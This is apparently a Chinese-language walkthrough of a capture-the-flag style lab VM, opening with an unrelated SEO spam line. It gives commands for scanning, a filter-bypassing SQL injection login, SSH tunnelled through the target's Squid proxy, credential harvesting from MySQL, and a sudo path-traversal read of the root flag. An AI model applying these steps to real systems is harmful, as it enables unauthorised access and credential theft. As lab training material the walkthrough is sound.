南山网站 建设seo信科seo网络推广软件
一、主机发现
arp-scan -l
得知靶机ip为192.168.55.152
二、端口扫描、目录枚举、指纹识别
2.1端口扫描
nmap -p- 192.168.55.152
发现靶机具有特殊端口
2.2目录枚举
dirb http://192.168.55.152
访问敏感目录,发现apache版本信息
2.3指纹识别
三、访问靶机页面,拿到低权限用户
进入靶机页面,发现存在登陆框,可以尝试sql注入
抓包尝试进行sql注入,发现确实存在注入
使用万能密码查询,发现or和=都被过滤了
尝试使用||代替or
成功出了一组账号密码
john
hereisjohn
尝试使用了ssh进行连接,但是一直连不上,想到刚刚端口扫描时扫到了3128这个开启了squid-http代理服务的端口,尝试连接
这里使用kali的proxychains工具代理到3128这个端口
sudo vim /etc/proxychains4.conf
http 192.168.55.152 3128
proxychains ssh john@192.168.55.152 -t "/bin/sh"
拿到靶机的低权限shell
四、提权
首先进行靶机信息收集
uname -a
发现靶机版本找不到合适漏洞
发现靶机还存在其它用户
查看john用户下的文件
没有信息,去根目录和网站目录继续寻找信息
在网站根目录下找到了login.php,查看该文件找到了连接数据库的账号密码均为root
连接数据库,进入数据库查询其他用户的账号密码
mysql -u root -p
拿到其他用户的账号密码
尝试使用其他账号密码进行登陆
sara ihatethisjob
william senseable
发现sara账号可以登陆进去,进去之后发现sara账号可以使用root的cat和ls命令
sudo -l
在sara账号下寻找root用户的目录,然后找root用户的密码
# 查看根目录下有哪些文件
sudo ls /accounts/../# 查看 /root 下的文件
sudo ls /accounts/../root# 查看 flag 文件
sudo cat /accounts/../root/flag.txt
后续直接su提权即可
成功提取!